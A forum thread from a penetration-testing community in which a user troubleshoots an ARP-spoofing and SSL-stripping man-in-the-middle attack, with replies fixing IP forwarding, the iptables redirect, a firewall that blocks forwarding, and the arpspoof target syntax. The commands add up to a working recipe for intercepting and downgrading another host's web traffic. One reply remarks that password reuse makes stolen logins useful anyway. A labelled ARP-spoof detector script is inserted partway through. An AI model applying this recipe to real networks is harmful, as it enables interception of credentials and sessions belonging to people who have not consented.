
Thread: How can I get SSL Strip to log traffic?

  1. #1
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    4

    Default How can I get SSL Strip to log traffic?

    Hello,

    I am trying to get SSL Strip to work on my wireless network. Everything seems fine until the very end.

    Here is what I do:

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sudo arpspoof -i wlan1 -t ip_to_attack gateway_ip

    This seems to work. A connection is made. My MAC is now considered to be the gateway IP.

    Then I run sudo python sslstrip.py -a -l 8080 -k.

    AIUI, the -a option logs all traffic.

    Although the sslstrip.log is created, it stays empty (0 bytes).

    There is traffic on the network and with the -a option surely it should be logged. What am I doing wrong?

    Many thanks!

  2. #2
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: How can I get SSL Strip to log traffic?

    I don't know if that may be the origin of your problem, but you login as root, so you shouldn't have to use "sudo".
    Second, your first command seems wrong (I'm not an expert, so it might work), but a glance at the author's website and you have it:
    echo "1" > /proc/sys/net/ipv4/ip_forward
    Also, to run sslstrip, you only need to type "sslstrip -a -l [port] -k"

    Next time, try and do some more research: the first result for "sslstrip" in Google is "http://www.thoughtcrime.org/software/sslstrip/"

    Just to be sure, you are running BackTrack, right?

  3. #3
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    4

    Default Re: How can I get SSL Strip to log traffic?

    Thanks for the advice.

    I now realise the problem is nothing to do with SSL Strip and everything to do with Arpspoof.

    As root I type:

    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    Then:

    arpspoof -i wlan1 -t 192.168.2.10 192.168.2.1 where 192.168.2.10 is my XP machine.

    At this point the screen shows that the gateway IP is at my MAC address - for example:

    0:c0:cd:43:ed:1f 0:14:f4:60:df:78 0806 42: arp reply 192.168.2.1 is-at 0:c0:cd:43:ed:1f

    However, on that XP machine I can no longer use the internet - no pages load - all time out. When I cancel arpspoofing, I can load pages again.

    Can someone please tell me why I cannot arpspoof? Thanks.


    I also did arpspoofing in both ways so the target believes I am the AP and the AP believes I am the target.

    I still have the same problem - the target cannot use the internet.
    Last edited by sickness; 02-18-2011 at 05:23 PM. Reason: Merged posts.
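
Added example, not part of the original thread: a defender-side check that parses ARP reply records in the format quoted in post #3 and flags an IP whose claimed MAC contradicts a known-good table, or one MAC answering for several IPs. The baseline table, the gateway's real MAC and sample lines 1 and 3 are constructed for illustration; line 2 is the one quoted in the post.

```python
import re
from collections import defaultdict

# Record format as quoted in post #3:
#   <src mac> <dst mac> 0806 42: arp reply <ip> is-at <mac>
MAC = r"[0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5}"
ARP_REPLY = re.compile(
    r"^" + MAC + r"\s+" + MAC + r"\s+0806\s+\d+:\s+arp reply "
    r"(?P<ip>\d+(?:\.\d+){3}) is-at (?P<mac>" + MAC + r")$",
    re.IGNORECASE,
)

def norm_mac(mac):
    """Zero-pad each octet so '0:c0:cd:43:ed:1f' equals '00:c0:cd:43:ed:1f'."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def find_arp_anomalies(lines, baseline):
    """Return (kind, ip, mac) findings, in first-seen order."""
    findings = []
    claimed = defaultdict(set)  # mac -> IPs it has claimed in replies
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if m is None:
            continue  # skip anything that is not an ARP reply record
        ip, mac = m.group("ip"), norm_mac(m.group("mac"))
        claimed[mac].add(ip)
        expected = baseline.get(ip)
        finding = ("binding-changed", ip, mac)
        if expected and norm_mac(expected) != mac and finding not in findings:
            findings.append(finding)
    # One MAC answering for several IPs is what two-way spoofing looks like
    # on the wire; proxy ARP can cause it too, so treat it as a lead.
    for mac, ips in claimed.items():
        if len(ips) > 1:
            findings.append(("mac-claims-many", ",".join(sorted(ips)), mac))
    return findings

# Known-good bindings (constructed; the gateway's real MAC is not in the thread,
# the target's MAC is the destination MAC of the quoted line).
BASELINE = {"192.168.2.1": "00:11:22:33:44:55",
            "192.168.2.10": "00:14:f4:60:df:78"}

SAMPLE = [  # line 2 is quoted from post #3, lines 1 and 3 are constructed
    "0:11:22:33:44:55 0:14:f4:60:df:78 0806 42: arp reply 192.168.2.1 is-at 0:11:22:33:44:55",
    "0:c0:cd:43:ed:1f 0:14:f4:60:df:78 0806 42: arp reply 192.168.2.1 is-at 0:c0:cd:43:ed:1f",
    "0:c0:cd:43:ed:1f 0:11:22:33:44:55 0806 42: arp reply 192.168.2.10 is-at 0:c0:cd:43:ed:1f",
]

if __name__ == "__main__":
    for finding in find_arp_anomalies(SAMPLE, BASELINE):
        print(finding)
```

The octet normalisation matters because the quoted output prints MACs without leading zeros, so a plain string comparison against a zero-padded baseline would report every binding as changed.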

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    78

    Default Re: How can I get SSL Strip to log traffic?

    Can someone please tell me why I cannot arpspoof?
    You can ARP spoof just fine, that's your problem. The target thinks your computer is the router but your computer isn't actually sending those packets after that point. Do a tracert from the victim machine to see for yourself. I believe, and I could very possibly be wrong, the problem is with your attempt to enable ip_forwarding. It should be,
    Code:
    echo 1 > ...
    not
    Code:
    echo "1" > ...
    Echoing "1" sends the text value of 1 instead of the integer 1. I think.
    Computer security is a temporary condition.

  5. #5
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    4

    Default

    Thanks for the advice.

    You are correct that the target is sending his traffic through my computer but then my computer refuses to forward it.

    When I traceroute from the target to the gateway the first hop is my computer then everything times out.

    Using echo 1 > rather than echo "1" > doesn't change anything and anyhow in the original instructions "1" is used: http://www.thoughtcrime.org/software/sslstrip/

    So the question is: why is my computer not forwarding the traffic it receives from the target?

    Sorry....please merge this thread, thanks.

    I have solved the problem detailed above by disabling my firewall since syslog showed UFW BLOCK.

    So now a traceroute from the target to the gateway via my IP as the MITM works.

    However, when I load a Firefox page from the target I now get "Connection Interrupted. The document contains no data."

    There are plenty of results for this on Google but nothing that explains what the solution is.

    Any more ideas gratefully received. Thanks!


    EDIT:

    The solution was simple. Foolishly I assumed that traffic was redirected when one started arpspoofing when in fact it is redirected once one uses sslstrip's -l 10000 (or whatever port number) option.

    My other suggestion is to turn off the UFW firewall or whatever is used because in my case that blocked redirection to the gateway.

    Another point regarding the -k option: if one is logged into Yahoo, Hotmail, or Facebook, -k will log you out. But it will not log you out of Gmail. Any idea why?

    Finally, occasionally, when I try to arpspoof -i wlan1 -t target_ip gateway_ip the screen indicated that spoofing begins but the MAC address of the target was 0:0:0:0:0:0. Obviously this is not good but what is the technical term for the six zeros?

    Thanks again.
    Last edited by sickness; 02-21-2011 at 01:06 PM. Reason: Merging...

  6. #6
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: How can I get SSL Strip to log traffic?

    Well, this happens when you try to convince a non-existing target on your network that you are the AP. The MAC then can't be resolved, hence the zeros! Check your target IP address.

    About the -k option, it works flawlessly for me... Only two sites didn't log me out: backtrack forums and another one. With that said, since people tend to use the same passwords everywhere, one site not logging out shouldn't be much of a problem!
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  7. #7
    Senior Member
    Join Date
    Jan 2011
    Location
    over the under
    Posts
    197

    Default Re: How can I get SSL Strip to log traffic?

    When I specify my -t option I do -t <victim's IP> <victim's router>. I'm pretty sure that's what comaX is saying, just in case you didn't already figure that out.
